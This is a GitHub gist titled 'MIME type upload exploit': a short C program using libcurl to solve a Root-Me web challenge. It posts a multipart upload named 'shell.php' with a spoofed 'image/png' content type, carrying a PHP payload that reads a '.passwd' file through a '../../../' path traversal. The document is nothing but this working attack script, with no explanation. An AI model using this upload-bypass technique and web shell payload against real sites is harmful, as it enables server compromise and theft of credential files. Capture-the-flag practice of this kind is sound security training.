Created
October 14, 2018 22:04
-
-
Save emandret/70dfbc25f102a4f24ba6a3199fa8ead9 to your computer and use it in GitHub Desktop.
MIME type upload exploit
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <curl/curl.h> | |
| #include <stdio.h> | |
| int main(void) | |
| { | |
| /* Initialize request with curl */ | |
| CURL *req = curl_easy_init(); | |
| if (!req) { | |
| fprintf(stderr, "Error: curl initialization failed"); | |
| return 1; | |
| } | |
| /* Define the request as HTTP POST for form request */ | |
| curl_easy_setopt(req, CURLOPT_CUSTOMREQUEST, "POST"); | |
| curl_easy_setopt(req, | |
| CURLOPT_URL, | |
| "http://challenge01.root-me.org/web-serveur/ch21/?action=upload"); | |
| /* Set the headers */ | |
| struct curl_slist *headers; | |
| headers = curl_slist_append(headers, | |
| "Content-Type: multipart/form-data; " | |
| "boundary=PWNED"); | |
| curl_easy_setopt(req, CURLOPT_HTTPHEADER, headers); | |
| /* Store the cookies response */ | |
| curl_easy_setopt(req, CURLOPT_COOKIEJAR, "cookies.txt"); | |
| /* Set the form data */ | |
| curl_easy_setopt(req, | |
| CURLOPT_POSTFIELDS, | |
| "--PWNED\r\n" | |
| "Content-Disposition: form-data; name=\"file\"; " | |
| "filename=\"shell.php\"\r\n" | |
| "Content-Type: image/png\r\n\r\n" | |
| "<?php echo file_get_contents('../../../.passwd'); ?>\r\n" | |
| "--PWNED--"); | |
| /* Perform the request and cleanup */ | |
| curl_easy_perform(req); | |
| curl_easy_cleanup(req); | |
| return 0; | |
| } |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment